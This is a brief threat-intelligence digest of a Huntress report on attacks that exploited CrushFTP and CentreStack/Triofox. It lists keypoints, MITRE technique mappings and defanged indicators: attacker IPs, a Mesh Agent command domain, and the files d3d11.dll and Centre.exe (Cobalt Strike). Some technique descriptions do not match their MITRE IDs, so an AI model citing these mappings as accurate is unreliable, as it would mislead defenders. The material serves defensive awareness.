Huntress analysts reported on two vulnerabilities involving CrushFTP and CentreStack/Triofox, highlighting common IOCs and TTPs used by threat actors across different incidents. They emphasized that consistent tactics were applied after exploiting initial vulnerabilities, underscoring the need for comprehensive incident response. (Affected: CrushFTP, CentreStack, Triofox, Windows Defender)
Keypoints :
- Recent Huntress reports detail two vulnerabilities exploited in distinct cyber incidents.
- Common indicators of compromise (IOCs) across incidents include specific IP addresses and file names.
- Threat actors exhibit similar tactics after gaining initial access via different vulnerabilities.
- Effective security tools can halt attacks before significant damage occurs.
- Organizations are advised to create asset inventories and implement attack surface reductions.
MITRE Techniques :
- T1069 – **Permission Groups Discovery**: Threat actors exploited vulnerabilities to gain initial access to systems.
- T1071 – **Application Layer Protocol**: Utilized Base64-encoded PowerShell commands to transfer files during attacks.
- T1203 – **Exploitation for Client Execution**: Exploited CrushFTP and CentreStack vulnerabilities for access.
- T1560 – **Archive Collected Data**: Downloaded malicious files like d3d11.dll and Centre.exe during incidents.
Indicator of Compromise :
- The article mentions the IP address 2.58.56[.]16 as a source for threat actor activity.
- A second IP, 196.251.85[.]31, is noted for downloading exploitation tools.
- The Mesh Agent connect endpoint, rtb[.]mftadsrvr[.]com, is indicated as a target for the agent installation.
- The malicious DLL file, d3d11.dll, was frequently referenced as part of the attacks.
- Centre.exe, which was detected as Cobalt Strike, was another file involved in the incidents.
Full Story: https://www.huntress.com/blog/do-tigers-really-change-their-stripes
Views: 25